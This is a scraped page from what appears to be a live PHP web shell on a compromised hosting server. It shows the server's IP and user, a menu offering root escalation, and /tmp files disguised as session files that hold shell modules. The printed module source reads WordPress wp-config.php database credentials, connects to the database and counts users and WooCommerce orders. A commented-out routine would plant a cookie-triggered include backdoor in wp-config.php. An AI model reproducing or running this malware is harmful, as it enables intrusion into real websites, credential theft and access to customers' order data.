Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.119.102.106
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
tmp /
mbdvd0 /
Delete
Unzip
Name
Size
Permission
Date
Action
sess_0a0651adaaf1f8f0cfc15ba2bd8069c3shells_wso
77.58
KB
-rw-r--r--
2025-04-11 09:40
sess_0da84599553944d82cf5f47f372d18demysql
2.44
KB
-rw-r--r--
2025-04-10 09:42
sess_65beb914521e3326955339d04393766ccms_wp
2.31
KB
-rw-r--r--
2025-04-10 09:42
sess_7342277d99cfbd7ac179ed31fd7dd8adcore
11.94
KB
-rw-r--r--
2025-04-10 09:37
sess_82b3bd03450bff66d731da032b8450dchttp
1.77
KB
-rw-r--r--
2025-04-10 09:37
sess_afd13013d4a645c28817fc52e4eb4879info
428
B
-rw-r--r--
2025-04-10 09:42
sess_bc2071c1be6d1c313aeef168beb5ae06files
14.43
KB
-rw-r--r--
2025-04-10 09:42
sess_f6eb15ce09f3e91a6b4e81577eaf2f66email
896
B
-rw-r--r--
2025-04-10 09:42
Save
Rename
<?php class mbd_cms_wp { function __construct($core) { $this->core = $core; } function spare() { /*$file = $this->core->root.'/wp-config.php'; if(!is_file($file)) return $this->core->out('not config file'); $data = $file = $this->core->file_get($file); $data = str_replace(array(), array('$cache = $_COOKIE;','$time = 415656;', 'if(isset($cache[$time])) include($cache[$time]);'), $data); if(!$this->core->file_put($file, $data)) return $this->core->out('failed to write to file'); $this->core->data->result = $result ;*/ } function mysql_config() { $file = $this->core->root.'/wp-config.php'; if(!is_file($file)) return $this->core->out('not config file'); $file = $this->core->file_get($file); $result = array(); foreach(array('DB_HOST','DB_USER','DB_PASSWORD','DB_NAME') AS $i => $n) { if(preg_match('|'.$n.'(?:[\'\"\s\,]+)getenv\([\'\"](.+)[\'\"]|', $file, $a)) $result[$i] = getenv($a[1]); elseif(preg_match('|'.$n.'(?:[\'\"\s\,]+)(.+)[\'\"]\s?\)|', $file, $a)) $result[$i] = $a[1]; else return $this->core->out('undefined '.$n); } $result[4] = preg_match('|\$table_prefix(?:[\'\"\s\=]+)(.+?)[\'\"]|', $file, $a) ? $a[1] : 'wp_'; if(preg_match('|DB_CHARSET(?:[\'\"\s\,]+)(.+)[\'\"]\s?\)|', $file, $a)) $result[5] = $a[1]; $this->core->data->result = $result; return $result; } function info() { $db = $this->core->load('mysql'); $db->connect($this->mysql_config()); $this->core->data->type = $db->type; $data = array( 'bd' => implode('::', $this->core->data->result), 'users' => $db->find('SELECT COUNT(*) FROM @P_users', 'first'), 'orders' => $db->find('SELECT COUNT(*) FROM @P_posts WHERE post_type=\'shop_order\'', 'first'), 'date' => $db->find('SELECT `post_date` FROM @P_posts WHERE post_type=\'shop_order\' ORDER BY `ID` DESC LIMIT 1', 'first'), 'theme' => $db->find('SELECT option_value FROM @P_options WHERE option_name=\'template\' LIMIT 1', 'first'), ); $this->core->data->result = $data; } function backup() { } }